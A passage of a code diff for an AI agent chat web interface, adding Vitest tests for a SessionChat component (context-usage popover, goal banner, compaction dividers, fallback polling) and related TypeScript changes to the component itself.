+          finish: 'stop',
+          parts: [
+            {
+              id: 'step-start-1',
+              messageID: 'assistant-process-2',
+              sessionID: 'sess-1',
+              type: 'step-start',
+            } as any,
+            {
+              id: 'reason-2',
+              messageID: 'assistant-process-2',
+              sessionID: 'sess-1',
+              type: 'thinking',
+              text: '再生成 workflow.json',
+            } as any,
+            {
+              id: 'tool-2',
+              messageID: 'assistant-process-2',
+              sessionID: 'sess-1',
+              type: 'tool',
+              tool: 'write',
+              callID: 'call-2',
+              state: {
+                status: 'completed',
+                input: { filePath: 'workflow.json' },
+                output: 'ok',
+              },
+            } as any,
+            {
+              id: 'step-finish-1',
+              messageID: 'assistant-process-2',
+              sessionID: 'sess-1',
+              type: 'step-finish',
+            } as any,
+          ],
+        }),
+      ],
+      loading: false,
+      refetch: vi.fn(),
+      addMessage: vi.fn(),
+      updateMessage: vi.fn(),
+      updateMessagePart: vi.fn(),
+      replaceMessageText: vi.fn(),
+      truncateAfterMessage: vi.fn(),
+    });
+
+    render(React.createElement(SessionChat, {
+      sessionId: 'sess-1',
+      display: { collapseIntermediateSteps: true },
+    }));
+
+    expect(screen.getAllByTestId('chat-process-group')).toHaveLength(1);
+    expect(screen.getByText('过程（4 项）')).toBeInTheDocument();
+    expect(screen.getByText('2 段思考 · 2 次工具调用')).toBeInTheDocument();
+  });
+
+  it('keeps the compact compaction bubble at the full assistant column width', async () => {
+    useSessionMessagesMock.mockReturnValue({
+      messages: [
+        makeMessage({
+          id: 'user-before-compaction',
+          role: 'user',
+          finish: 'stop',
+          parts: [
+            {
+              id: 'user-text',
+              messageID: 'user-before-compaction',
+              sessionID: 'sess-1',
+              type: 'text',
+              text: '继续优化工作流',
+            } as any,
+          ],
+        }),
+      ],
+      loading: false,
+      refetch: vi.fn(),
+      addMessage: vi.fn(),
+      updateMessage: vi.fn(),
+      updateMessagePart: vi.fn(),
+      replaceMessageText: vi.fn(),
+      truncateAfterMessage: vi.fn(),
+    });
+
+    render(React.createElement(SessionChat, {
+      sessionId: 'sess-1',
+      live: true,
+      display: { collapseIntermediateSteps: true },
+    }));
+
+    act(() => {
+      useSSEOptionsRef.current.onEvent({
+        type: 'session.status',
+        properties: {
+          sessionID: 'sess-1',
+          status: { type: 'compacting', message: '正在压缩上下文...' },
+        },
+      });
+    });
+
+    const compactionText = await screen.findByText('正在压缩上下文...');
+    expect(compactionText.closest('.w-full.max-w-full')).not.toBeNull();
+  });
 });
 
 describe('SessionChat agent mentions', () => {
@@ -464,6 +1121,28 @@ describe('SessionChat agent mentions', () => {
     });
   });
 
+  it('uses the selected agent when creating a session from the first message', async () => {
+    const user = userEvent.setup();
+    const onCreateAndSend = vi.fn().mockResolvedValue('sess-created');
+    render(React.createElement(SessionChat, {
+      sessionId: null,
+      agentName: 'explore',
+      mentionAgents,
+      onCreateAndSend,
+    }));
+
+    await user.type(screen.getByPlaceholderText('请输入消息'), 'summarize this file{enter}');
+
+    await waitFor(() => {
+      expect(onCreateAndSend).toHaveBeenCalledWith(
+        'summarize this file',
+        [],
+        'explore',
+        undefined,
+      );
+    });
+  });
+
   it('queues streaming messages to the mentioned agent', async () => {
     const user = userEvent.setup();
     render(React.createElement(SessionChat, {
@@ -612,16 +1291,453 @@ describe('ChatToolPart todo rendering', () => {
       }),
     );
 
-    expect(container.textContent).toContain('Progress 1/3 · In progress 1');
+    expect(container.textContent).toContain('进度 1/3 · 进行中 1');
     expect(container.textContent).toContain('Todo 阶段');
     expect(container.textContent).toContain('定位 todo 摘要问题中');
-    expect(container.textContent).toContain('completed');
+    expect(container.textContent).toContain('完成');
+    expect(container.textContent).not.toContain('completed');
     expect(container.textContent).not.toContain('输入参数');
     expect(container.textContent).not.toContain('输出结果');
     expect(container.textContent).not.toContain('[object Object]');
   });
 });
 
+describe('SessionChat context usage popover', () => {
+  it('always shows fixed usage rows and hides compacted history', async () => {
+    const user = userEvent.setup();
+    sessionApiGetContextUsageMock.mockResolvedValue({
+      sessionID: 'sess-1',
+      usedTokens: 120,
+      contextWindow: 1000,
+      percent: 12,
+      source: 'estimated',
+      estimatedTokens: 120,
+      compactedTokens: 0,
+      segments: [
+        { key: 'systemPrompt', tokens: 80, included: true, source: 'estimated' },
+        { key: 'agentDelegation', tokens: 0, included: true, source: 'estimated' },
+      ],
+      excludedSegments: [
+        { key: 'compactedHistory', tokens: 12000, included: false, source: 'estimated' },
+      ],
+    });
+
+    render(React.createElement(SessionChat, { sessionId: 'sess-1' }));
+
+    const contextButton = await screen.findByRole('button', { name: 'chat.contextUsageTitle' });
+    expect(contextButton).toHaveClass('h-6', 'w-6');
+    await user.click(contextButton);
+
+    expect(screen.getByText('System prompt')).toBeInTheDocument();
+    expect(screen.getByText('Tool definitions')).toBeInTheDocument();
+    expect(screen.getByText('Conversation')).toBeInTheDocument();
+    expect(screen.getByText('Reasoning')).toBeInTheDocument();
+    expect(screen.getByText('Tool calls')).toBeInTheDocument();
+    expect(screen.getByText('Skill loads')).toBeInTheDocument();
+    expect(screen.getByText('Agent delegation')).toBeInTheDocument();
+    expect(screen.getAllByText('0').length).toBeGreaterThanOrEqual(4);
+    expect(screen.queryByText('Compacted history')).not.toBeInTheDocument();
+  });
+
+  it('keeps usage visible while recalculating after compaction succeeds', async () => {
+    const user = userEvent.setup();
+    sessionApiGetContextUsageMock
+      .mockResolvedValueOnce({
+        sessionID: 'sess-1',
+        usedTokens: 900,
+        contextWindow: 1000,
+        percent: 90,
+        source: 'estimated',
+        estimatedTokens: 900,
+        compactedTokens: 0,
+        segments: [
+          { key: 'conversation', tokens: 900, included: true, source: 'estimated' },
+        ],
+        excludedSegments: [],
+      })
+      .mockResolvedValueOnce({
+        sessionID: 'sess-1',
+        usedTokens: 420,
+        contextWindow: 1000,
+        percent: 42,
+        source: 'estimated',
+        estimatedTokens: 420,
+        compactedTokens: 0,
+        segments: [
+          { key: 'conversation', tokens: 420, included: true, source: 'estimated' },
+        ],
+        excludedSegments: [],
+      });
+    useSessionMessagesMock.mockReturnValue({
+      messages: [
+        makeMessage({
+          id: 'stale-user',
+          role: 'user',
+          parts: [{ id: 'stale-user-part', type: 'text', text: 'x'.repeat(4000) }] as Message['parts'],
+        }),
+      ],
+      loading: false,
+      refetch: vi.fn(),
+      addMessage: vi.fn(),
+      updateMessage: vi.fn(),
+      updateMessagePart: vi.fn(),
+      replaceMessageText: vi.fn(),
+      truncateAfterMessage: vi.fn(),
+    });
+
+    render(React.createElement(SessionChat, { sessionId: 'sess-1', live: true }));
+
+    const contextButton = await screen.findByRole('button', { name: 'chat.contextUsageTitle' });
+    await user.click(contextButton);
+    expect(await screen.findByText('Conversation')).toBeInTheDocument();
+    expect(screen.getByText('900')).toBeInTheDocument();
+
+    act(() => {
+      useSSEOptionsRef.current.onEvent({
+        type: 'context.compacted',
+        properties: { sessionID: 'sess-1' },
+      });
+    });
+
+    expect(screen.getByText('900')).toBeInTheDocument();
+    await waitFor(() => {
+      expect(screen.getByText('420')).toBeInTheDocument();
+    });
+    expect(screen.getByText('Conversation')).toBeInTheDocument();
+  });
+
+  it('refreshes context usage after compaction fails', async () => {
+    const user = userEvent.setup();
+    const onError = vi.fn();
+    sessionApiGetContextUsageMock
+      .mockResolvedValueOnce({
+        sessionID: 'sess-1',
+        usedTokens: 900,
+        contextWindow: 1000,
+        percent: 90,
+        source: 'estimated',
+        estimatedTokens: 900,
+        compactedTokens: 0,
+        segments: [
+          { key: 'conversation', tokens: 900, included: true, source: 'estimated' },
+        ],
+        excludedSegments: [],
+      })
+      .mockResolvedValueOnce({
+        sessionID: 'sess-1',
+        usedTokens: 420,
+        contextWindow: 1000,
+        percent: 42,
+        source: 'estimated',
+        estimatedTokens: 420,
+        compactedTokens: 0,
+        segments: [
+          { key: 'conversation', tokens: 420, included: true, source: 'estimated' },
+        ],
+        excludedSegments: [],
+      });
+
+    render(React.createElement(SessionChat, { sessionId: 'sess-1', live: true, onError }));
+
+    await waitFor(() => {
+      expect(sessionApiGetContextUsageMock).toHaveBeenCalledTimes(1);
+    });
+
+    act(() => {
+      useSSEOptionsRef.current.onEvent({
+        type: 'session.status',
+        properties: {
+          sessionID: 'sess-1',
+          status: { type: 'compacting', message: 'Compacting context…' },
+        },
+      });
+    });
+    const contextButton = await screen.findByRole('button', { name: 'chat.contextUsageTitle' });
+    await user.click(contextButton);
+    expect(screen.getByText('900')).toBeInTheDocument();
+
+    act(() => {
+      useSSEOptionsRef.current.onEvent({
+        type: 'session.error',
+        properties: {
+          sessionID: 'sess-1',
+          error: { message: 'provider unavailable' },
+        },
+      });
+    });
+
+    await waitFor(() => {
+      expect(sessionApiGetContextUsageMock).toHaveBeenCalledTimes(2);
+    });
+    expect(onError).toHaveBeenCalledWith('provider unavailable');
+
+    expect(screen.getByText('420')).toBeInTheDocument();
+  });
+
+  it('does not refetch immediately after a pushed context usage snapshot', async () => {
+    sessionApiGetContextUsageMock.mockResolvedValueOnce({
+      sessionID: 'sess-1',
+      usedTokens: 900,
+      contextWindow: 1000,
+      percent: 90,
+      source: 'estimated',
+      estimatedTokens: 900,
+      compactedTokens: 0,
+      segments: [
+        { key: 'conversation', tokens: 900, included: true, source: 'estimated' },
+      ],
+      excludedSegments: [],
+    });
+
+    render(React.createElement(SessionChat, { sessionId: 'sess-1', live: true }));
+
+    await waitFor(() => {
+      expect(sessionApiGetContextUsageMock).toHaveBeenCalledTimes(1);
+    });
+
+    act(() => {
+      useSSEOptionsRef.current.onEvent({
+        type: 'context.usage.updated',
+        properties: {
+          sessionID: 'sess-1',
+          usedTokens: 420,
+          contextWindow: 1000,
+          percent: 42,
+          source: 'estimated',
+          estimatedTokens: 420,
+          compactedTokens: 0,
+          segments: [
+            { key: 'conversation', tokens: 420, included: true, source: 'estimated' },
+          ],
+          excludedSegments: [],
+        },
+      });
+      useSSEOptionsRef.current.onEvent({
+        type: 'session.status',
+        properties: {
+          sessionID: 'sess-1',
+          status: { type: 'idle' },
+        },
+      });
+    });
+
+    expect(sessionApiGetContextUsageMock).toHaveBeenCalledTimes(1);
+  });
+});
+
+describe('SessionChat goal banner', () => {
+  it('hydrates a persisted goal banner when the session loads', async () => {
+    sessionApiGetMock.mockResolvedValue({
+      id: 'sess-1',
+      goal: {
+        status: 'active',
+        objective: 'List built-in tools',
+      },
+    });
+
+    render(React.createElement(SessionChat, { sessionId: 'sess-1', live: true }));
+
+    expect(await screen.findByText('Goal')).toBeInTheDocument();
+    expect(screen.getByText('List built-in tools')).toBeInTheDocument();
+    expect(sessionApiGetMock).toHaveBeenCalledWith('sess-1');
+  });
+
+  it('shows goal status updates and lets the user dismiss the current notice', async () => {
+    const user = userEvent.setup();
+    render(React.createElement(SessionChat, { sessionId: 'sess-1', live: true }));
+
+    act(() => {
+      useSSEOptionsRef.current.onEvent({
+        type: 'session.goal.updated',
+        properties: {
+          sessionID: 'sess-1',
+          status: 'active',
+          objective: 'List built-in tools',
+        },
+      });
+    });
+
+    expect(await screen.findByText('Goal')).toBeInTheDocument();
+    expect(screen.getByText('List built-in tools')).toBeInTheDocument();
+
+    act(() => {
+      useSSEOptionsRef.current.onEvent({
+        type: 'session.goal.updated',
+        properties: {
+          sessionID: 'sess-1',
+          status: 'completed',
+          objective: 'List built-in tools',
+          reason: 'Goal complete: tools listed',
+        },
+      });
+    });
+
+    expect(await screen.findByText('Completed')).toBeInTheDocument();
+    expect(screen.getByText('List built-in tools')).toBeInTheDocument();
+
+    await user.click(screen.getByRole('button', { name: 'Dismiss goal notice' }));
+
+    expect(screen.queryByText('Completed')).not.toBeInTheDocument();
+    expect(screen.queryByText('List built-in tools')).not.toBeInTheDocument();
+  });
+
+  it('keeps a dismissed persisted goal hidden after remount', async () => {
+    const user = userEvent.setup();
+    sessionApiGetMock.mockResolvedValue({
+      id: 'sess-1',
+      goal: {
+        status: 'completed',
+        objective: 'List built-in tools',
+        reason: 'Goal complete: tools listed',
+      },
+    });
+
+    const view = render(React.createElement(SessionChat, { sessionId: 'sess-1', live: true }));
+
+    expect(await screen.findByText('Completed')).toBeInTheDocument();
+    await user.click(screen.getByRole('button', { name: 'Dismiss goal notice' }));
+    expect(screen.queryByText('Completed')).not.toBeInTheDocument();
+    expect(window.localStorage.getItem('flocks:session:sess-1:dismissedGoal')).toBe(
+      'completed:List built-in tools',
+    );
+    // Remount: component state is gone, so only the persisted dismissal can keep the banner hidden.
+    view.unmount();
+    render(React.createElement(SessionChat, { sessionId: 'sess-1', live: true }));
+
+    await waitFor(() => expect(sessionApiGetMock).toHaveBeenCalledTimes(2));
+    // Let the second fetch settle first; asserting absence before hydration could never fail.
+    await act(async () => { await sessionApiGetMock.mock.results[1]?.value; });
+    expect(screen.queryByText('Completed')).not.toBeInTheDocument();
+    expect(screen.queryByText('List built-in tools')).not.toBeInTheDocument();
+  });
+
+  it('shows a new goal even when a previous goal was dismissed', async () => {
+    const user = userEvent.setup();
+    render(React.createElement(SessionChat, { sessionId: 'sess-1', live: true }));
+
+    act(() => {
+      useSSEOptionsRef.current.onEvent({
+        type: 'session.goal.updated',
+        properties: {
+          sessionID: 'sess-1',
+          status: 'completed',
+          objective: 'List built-in tools',
+        },
+      });
+    });
+    expect(await screen.findByText('Completed')).toBeInTheDocument();
+    await user.click(screen.getByRole('button', { name: 'Dismiss goal notice' }));
+
+    act(() => {
+      useSSEOptionsRef.current.onEvent({
+        type: 'session.goal.updated',
+        properties: {
+          sessionID: 'sess-1',
+          status: 'active',
+          objective: 'Calculate 4+87',
+        },
+      });
+    });
+
+    expect(await screen.findByText('Goal')).toBeInTheDocument();
+    expect(screen.getByText('Calculate 4+87')).toBeInTheDocument();
+  });
+});
+
+describe('SessionChat compaction divider', () => {
+  it('keeps archived history visible before the compressed-context divider', () => {
+    useSessionMessagesMock.mockReturnValue({
+      messages: [
+        makeMessage({
+          id: 'old-user',
+          role: 'user',
+          compacted: true,
+          parts: [{ id: 'old-user-part', type: 'text', text: 'old visible request' }] as Message['parts'],
+        }),
+        makeMessage({
+          id: 'summary-1',
+          role: 'assistant',
+          finish: 'summary',
+          parts: [],
+        }),
+        makeMessage({
+          id: 'assistant-1',
+          role: 'assistant',
+          finish: 'stop',
+          parts: [{ id: 'assistant-1-part', type: 'text', text: 'current answer' }] as Message['parts'],
+        }),
+      ],
+      loading: false,
+      refetch: vi.fn(),
+      addMessage: vi.fn(),
+      updateMessage: vi.fn(),
+      updateMessagePart: vi.fn(),
+      replaceMessageText: vi.fn(),
+      truncateAfterMessage: vi.fn(),
+    });
+
+    render(React.createElement(SessionChat, { sessionId: 'sess-1' }));
+
+    const dividerLabel = screen.getByText('上下文已压缩');
+    expect(dividerLabel).toBeInTheDocument();
+    expect(dividerLabel).not.toHaveClass('rounded-full');
+    expect(dividerLabel).not.toHaveClass('border');
+    expect(dividerLabel).not.toHaveClass('bg-white');
+    expect(screen.getByText('old visible request')).toBeInTheDocument();
+    expect(screen.getByText('current answer')).toBeInTheDocument();
+  });
+
+  it('renders one chronological divider for each summary message', () => {
+    useSessionMessagesMock.mockReturnValue({
+      messages: [
+        makeMessage({
+          id: 'old-user',
+          role: 'user',
+          compacted: true,
+          parts: [{ id: 'old-user-part', type: 'text', text: 'first archived turn' }] as Message['parts'],
+        }),
+        makeMessage({
+          id: 'summary-1',
+          role: 'assistant',
+          finish: 'summary',
+          parts: [],
+        }),
+        makeMessage({
+          id: 'middle-user',
+          role: 'user',
+          compacted: true,
+          parts: [{ id: 'middle-user-part', type: 'text', text: 'second archived turn' }] as Message['parts'],
+        }),
+        makeMessage({
+          id: 'summary-2',
+          role: 'assistant',
+          finish: 'summary',
+          parts: [],
+        }),
+        makeMessage({
+          id: 'assistant-1',
+          role: 'assistant',
+          finish: 'stop',
+          parts: [{ id: 'assistant-1-part', type: 'text', text: 'current answer' }] as Message['parts'],
+        }),
+      ],
+      loading: false,
+      refetch: vi.fn(),
+      addMessage: vi.fn(),
+      updateMessage: vi.fn(),
+      updateMessagePart: vi.fn(),
+      replaceMessageText: vi.fn(),
+      truncateAfterMessage: vi.fn(),
+    });
+
+    render(React.createElement(SessionChat, { sessionId: 'sess-1' }));
+
+    expect(screen.getByText('first archived turn')).toBeInTheDocument();
+    expect(screen.getByText('second archived turn')).toBeInTheDocument();
+    expect(screen.getAllByText('上下文已压缩')).toHaveLength(2);
+  });
+});
+
 describe('getRegenerateTruncateTarget', () => {
   it('truncates back to the parent user message for assistant regenerations', () => {
     const target = getRegenerateTruncateTarget([
@@ -658,6 +1774,177 @@ describe('shouldRefetchFinishedMessage', () => {
   });
 });
 
+describe('streaming activity helpers', () => {
+  it('detects pending and running tool parts as active', () => {
+    expect(hasActiveToolPart([
+      { id: 'tool-1', type: 'tool', state: { status: 'pending' } } as Message['parts'][number],
+    ])).toBe(true);
+    expect(hasActiveToolPart([
+      { id: 'tool-1', type: 'tool', state: { status: 'running' } } as Message['parts'][number],
+    ])).toBe(true);
+  });
+
+  it('does not treat completed or error tool parts as active', () => {
+    expect(hasActiveToolPart([
+      { id: 'tool-1', type: 'tool', state: { status: 'completed' } } as Message['parts'][number],
+      { id: 'tool-2', type: 'tool', state: { status: 'error' } } as Message['parts'][number],
+    ])).toBe(false);
+  });
+
+  it('keeps busy, compacting, and retry session statuses active', () => {
+    expect(isActiveSessionStatus({ type: 'busy' })).toBe(true);
+    expect(isActiveSessionStatus({ type: 'compacting' })).toBe(true);
+    expect(isActiveSessionStatus({ type: 'retry' })).toBe(true);
+    expect(isActiveSessionStatus({ type: 'idle' })).toBe(false);
+    expect(isActiveSessionStatus(undefined)).toBe(false);
+  });
+});
+
+describe('SessionChat fallback polling', () => {
+  it('does not finish streaming while fetched messages still contain a running tool', async () => {
+    vi.useFakeTimers();
+    const refetch = vi.fn();
+    const onStreamingDone = vi.fn();
+    try {
+      useSessionMessagesMock.mockReturnValue({
+        messages: [
+          makeMessage({
+            id: 'assistant-1',
+            finish: 'tool-calls',
+            parts: [
+              { id: 'tool-1', type: 'tool', state: { status: 'running' } } as Message['parts'][number],
+            ],
+          }),
+        ],
+        loading: false,
+        refetch,
+        addMessage: vi.fn(),
+        updateMessage: vi.fn(),
+        updateMessagePart: vi.fn(),
+        replaceMessageText: vi.fn(),
+        truncateAfterMessage: vi.fn(),
+      });
+      clientGetMock.mockResolvedValueOnce({
+        data: [
+          {
+            info: {
+              id: 'assistant-1',
+              sessionID: 'sess-1',
+              role: 'assistant',
+              finish: 'tool-calls',
+            },
+            parts: [
+              { id: 'tool-1', type: 'tool', state: { status: 'running' } },
+            ],
+          },
+        ],
+      });
+
+      render(React.createElement(SessionChat, {
+        sessionId: 'sess-1',
+        live: true,
+        onStreamingDone,
+      }));
+      act(() => {
+        useSSEOptionsRef.current.onEvent({
+          type: 'session.status',
+          properties: { sessionID: 'sess-1', status: { type: 'busy' } },
+        });
+      });
+      // Advance inside act() so timer-driven React state updates are flushed before asserting.
+      await act(async () => { await vi.advanceTimersByTimeAsync(5_000); });
+
+      expect(refetch).not.toHaveBeenCalled();
+      expect(onStreamingDone).not.toHaveBeenCalled();
+      expect(clientGetMock).toHaveBeenCalledWith('/api/session/sess-1/message');
+    } finally {
+      vi.useRealTimers();
+    }
+  });
+
+  it('finishes streaming when only the local active tool ref is stale', async () => {
+    vi.useFakeTimers();
+    const refetch = vi.fn();
+    const onStreamingDone = vi.fn();
+    try {
+      useSessionMessagesMock.mockReturnValue({
+        messages: [
+          makeMessage({
+            id: 'assistant-1',
+            finish: 'stop',
+            parts: [
+              { id: 'text-1', type: 'text', text: 'done' } as Message['parts'][number],
+            ],
+          }),
+        ],
+        loading: false,
+        refetch,
+        addMessage: vi.fn(),
+        updateMessage: vi.fn(),
+        updateMessagePart: vi.fn(),
+        replaceMessageText: vi.fn(),
+        truncateAfterMessage: vi.fn(),
+      });
+      clientGetMock.mockImplementation((url: string) => {
+        if (url === '/api/session/sess-1/message') {
+          return Promise.resolve({
+            data: [
+              {
+                info: {
+                  id: 'assistant-1',
+                  sessionID: 'sess-1',
+                  role: 'assistant',
+                  finish: 'stop',
+                },
+                parts: [
+                  { id: 'text-1', type: 'text', text: 'done' },
+                ],
+              },
+            ],
+          });
+        }
+        if (url === '/api/session/status') {
+          return Promise.resolve({ data: { 'sess-1': { type: 'idle' } } });
+        }
+        return Promise.resolve({ data: {} });
+      });
+
+      render(React.createElement(SessionChat, {
+        sessionId: 'sess-1',
+        live: true,
+        onStreamingDone,
+      }));
+      act(() => {
+        useSSEOptionsRef.current.onEvent({
+          type: 'session.status',
+          properties: { sessionID: 'sess-1', status: { type: 'busy' } },
+        });
+        useSSEOptionsRef.current.onEvent({
+          type: 'message.part.updated',
+          properties: {
+            part: {
+              id: 'tool-1',
+              messageID: 'assistant-1',
+              sessionID: 'sess-1',
+              type: 'tool',
+              state: { status: 'running' },
+            },
+          },
+        });
+      });
+
+      await act(async () => {
+        await vi.advanceTimersByTimeAsync(5_000);
+      });
+
+      expect(refetch).toHaveBeenCalled();
+      expect(onStreamingDone).toHaveBeenCalled();
+    } finally {
+      vi.useRealTimers();
+    }
+  });
+});
+
 describe('areChatMessagePartsRenderEqual', () => {
   it('detects streamed text updates even when a later tool part exists', () => {
     const sharedToolPart = {
diff --git a/webui/src/components/common/SessionChat.tsx b/webui/src/components/common/SessionChat.tsx
index c2e26ab30..23212a683 100644
--- a/webui/src/components/common/SessionChat.tsx
+++ b/webui/src/components/common/SessionChat.tsx
@@ -1,23 +1,23 @@
 /**
- * SessionChat — 统一的 Agent Session 对话组件
+ * SessionChat — shared Agent Session conversation component.
  *
- * 产品中所有需要 AI 对话能力的地方都应使用此组件：
- * - Session 会话主页面 (compact=false)
- * - 工作流编辑对话面板
- * - 任务执行详情面板
- * - ChatDialog 弹窗
- * - EntitySheet Rex 对话 Tab
+ * Use this component anywhere the product needs an AI conversation surface:
+ * - Main Session page (compact=false)
+ * - Workflow edit chat panel
+ * - Task execution detail panel
+ * - ChatDialog modal
+ * - EntitySheet Rex chat tab
  *
- * 功能：
- * - 加载并展示指定 session 的完整对话消息
- * - SSE 实时流式更新
- * - 渲染 text / reasoning / tool 三种 part 类型
- * - 底部追问输入框（可通过 hideInput 隐藏）
- * - 消息复制、时间戳等可选功能
+ * Capabilities:
+ * - Load and render the complete conversation for a session
+ * - Stream live updates over SSE
+ * - Render text, reasoning, and tool parts
+ * - Provide a follow-up composer that can be hidden with hideInput
+ * - Support optional copy actions, timestamps, and related affordances
  */
 
-import { useState, useCallback, useRef, useEffect, useMemo, memo } from 'react';
-import { Send, Loader2, ChevronDown, Square, Copy, User, FileText, AlertCircle, X, RefreshCw, Pencil, Save, ImageIcon, Paperclip, ArrowUp, Clock, CheckCircle2, XCircle, Brain, Trash2, Bot } from 'lucide-react';
+import { useState, useCallback, useRef, useEffect, useLayoutEffect, useMemo, memo } from 'react';
+import { Send, Loader2, ChevronDown, Square, Copy, User, FileText, AlertCircle, X, RefreshCw, Pencil, Save, ImageIcon, Paperclip, ArrowUp, Clock, CheckCircle2, XCircle, Brain, Trash2, Bot, Check, ListTree } from 'lucide-react';
 import { StreamingMarkdown } from './StreamingMarkdown';
 import { useTranslation } from 'react-i18next';
 import LoadingSpinner from './LoadingSpinner';
@@ -29,7 +29,7 @@ import { useSessionMessages } from '@/hooks/useSessions';
 import { useSSE, type SSEConnectionStatus } from '@/hooks/useSSE';
 import { useReasoningToggle } from '@/hooks/useReasoningToggle';
 import { usePendingQuestions, type PendingQuestion } from '@/hooks/usePendingQuestions';
-import { sessionApi, type QueuedPrompt } from '@/api/session';
+import { sessionApi, type ContextUsageSnapshot, type QueuedPrompt } from '@/api/session';
 import client, { getApiBase } from '@/api/client';
 import { commandAPI, type Command } from '@/api/skill';
 import type { Agent } from '@/api/agent';
@@ -48,7 +48,7 @@ import {
   readFileAsDataUrl,
   type ImagePartData,
 } from '@/utils/imageUpload';
-import type { Message, MessagePart, ToolState } from '@/types';
+import type { Message, MessagePart, SessionGoalState, ToolState } from '@/types';
 
 export { formatSmartTime };
 export type { SSEConnectionStatus };
@@ -71,13 +71,45 @@ export interface NodeRef {
   description?: string;
 }
 
+type GoalBannerStatus = 'active' | 'completed' | 'blocked' | 'paused'; // Statuses the goal banner distinguishes.
+/** State behind the goal banner. NOTE(review): field meanings are inferred from their names — confirm against the banner renderer. */
+interface GoalBannerState {
+  objective: string; // Goal text (presumably what the banner displays).
+  status: GoalBannerStatus;
+  reason?: string; // Optional explanation accompanying the status.
+}
+
 export interface ConversationBottomSlotActions {
-  sendPrompt: (text: string) => void;
+  sendPrompt: (text: string, options?: PromptDisplayOptions) => void;
   setInput: (text: string) => void;
   focusInput: () => void;
   sending: boolean;
   streaming: boolean;
   sessionId?: string | null;
+  hasMessages: boolean;
+}
+/** Optional display hints accepted alongside a prompt by `sendPrompt` and `onCreateAndSend`. */
+export interface PromptDisplayOptions {
+  displayText?: string; // NOTE(review): presumably shown in place of the raw prompt text — confirm with callers.
+}
+
+const INSTRUCTION_DISPLAY_PREFIX = '@@flocks-instruction:';
+/** Prefixes `label` with the instruction marker so parseInstructionDisplayText can recognise it. */
+export function buildInstructionDisplayText(label: string): string {
+  return INSTRUCTION_DISPLAY_PREFIX.concat(label);
+}
+/** Returns the trimmed label of an instruction-display string, or null when the marker is missing or the label is empty. */
+export function parseInstructionDisplayText(text: string): string | null {
+  if (!text.startsWith(INSTRUCTION_DISPLAY_PREFIX)) return null;
+  const label = text.slice(INSTRUCTION_DISPLAY_PREFIX.length).trim();
+  return label || null;
+}
+/** Text to show for a part: metadata.displayText (or display_text when that is null/undefined) if it is a non-empty string, else part.text. */
+function getMessagePartDisplayText(part: MessagePart): string {
+  const override = part.metadata?.displayText ?? part.metadata?.display_text;
+  // Empty or non-string overrides fall through to the part's own text (or '').
+  if (typeof override === 'string' && override) return override;
+  return part.text || '';
 }
 
 /** Display-related options grouped to reduce prop surface. */
@@ -90,6 +122,10 @@ export interface SessionChatDisplay {
   showActions?: boolean;
   /** Show timestamp below each message */
   showTimestamp?: boolean;
+  /** Default-collapse intermediate reasoning and tool-process details in embedded panels. */
+  collapseIntermediateSteps?: boolean;
+  /** Initial open state for grouped reasoning/tool-process details. */
+  processGroupsDefaultOpen?: boolean;
 }
 
 export interface SessionChatProps {
@@ -163,6 +199,7 @@ export interface SessionChatProps {
     imageParts?: ImagePartData[],
     agentOverride?: string,
     modelOverride?: { providerID: string; modelID: string } | null,
+    options?: PromptDisplayOptions,
   ) => Promise<unknown> | unknown;
   /** Called when the user sends "/new" to create a new session */
   onCreateNewSession?: () => Promise<void> | void;
@@ -203,6 +240,15 @@ function countTokensLikeCompaction(text: string | null | undefined): number {
   return Math.floor(text.length / APPROX_CHARS_PER_TOKEN);
 }
 
+const INSIGNIFICANT_THINKING_TEXT_RE = /^[\p{P}\p{S}]+$/u;
+/** Trimmed text of a reasoning/thinking part; '' for other part types, blank text, or text made only of punctuation/symbols. */
+export function getRenderableThinkingText(part: Pick<MessagePart, 'type' | 'text' | 'thinking'>): string {
+  const isThinkingPart = part.type === 'reasoning' || part.type === 'thinking';
+  if (!isThinkingPart) return '';
+  const candidate = (part.text || part.thinking || '').trim();
+  return candidate && !INSIGNIFICANT_THINKING_TEXT_RE.test(candidate) ? candidate : '';
+}
+
 function stringifyToolPayload(value: unknown): string {
   if (value == null) return '';
   if (typeof value === 'string') return value;
@@ -217,7 +263,7 @@ function estimatePartTokens(part: MessagePart): number {
   if (part.type === 'text') {
     return countTokensLikeCompaction(part.text);
   }
-  if (part.type === 'reasoning') {
+  if (part.type === 'reasoning' || part.type === 'thinking') {
     return countTokensLikeCompaction(part.text);
   }
   if (part.type === 'tool' && part.state) {
@@ -231,11 +277,203 @@ function estimatePartTokens(part: MessagePart): number {
   return 0;
 }
 
-function estimateContextTokens(messages: Message[], draft: string): number {
-  const messageTokens = messages.reduce((total, message) => (
-    total + message.parts.reduce((sum, part) => sum + estimatePartTokens(part), 0)
+export interface ContextUsageBreakdownSegment { // One row of the context-usage breakdown.
+  key:
+    | 'systemPrompt'
+    | 'toolDefinitions'
+    | 'tools'
+    | 'skillLoad'
+    | 'agentDelegation'
+    | 'conversation'
+    | 'reasoning'
+    | 'draft'
+    | 'compactedHistory';
+  tokens: number; // Token count attributed to this segment.
+  colorClass: string; // CSS class for the segment, taken from CONTEXT_SEGMENT_COLORS.
+  included: boolean; // NOTE(review): presumably false for segments kept out of the used total — confirm.
+}
+/** Shape returned by buildContextUsageBreakdown: totals plus the per-segment rows. */
+export interface ContextUsageBreakdown {
+  usedTokens: number;
+  compactedTokens: number;
+  segments: ContextUsageBreakdownSegment[];
+  excludedSegments: ContextUsageBreakdownSegment[];
+}
+/** Background colour class for each context-usage segment key. */
+const CONTEXT_SEGMENT_COLORS: Record<ContextUsageBreakdownSegment['key'], string> = {
+  systemPrompt: 'bg-zinc-400',
+  toolDefinitions: 'bg-violet-400',
+  tools: 'bg-indigo-400',
+  skillLoad: 'bg-amber-400',
+  agentDelegation: 'bg-emerald-500',
+  conversation: 'bg-slate-500',
+  reasoning: 'bg-rose-400',
+  draft: 'bg-sky-400',
+  compactedHistory: 'bg-zinc-300',
+};
+/** Every known segment key as a plain string, used to validate untyped keys. */
+const CONTEXT_SEGMENT_KEYS = new Set(Object.keys(CONTEXT_SEGMENT_COLORS));
+const CONTEXT_USAGE_FIXED_SEGMENT_KEYS = [ // Rows normalizeFixedContextSegments always emits, in this order.
+  'systemPrompt',
+  'toolDefinitions',
+  'conversation',
+  'reasoning',
+  'tools',
+  'skillLoad',
+  'agentDelegation',
+] as const satisfies readonly ContextUsageBreakdownSegment['key'][]; // 'draft' and 'compactedHistory' are not in this list.
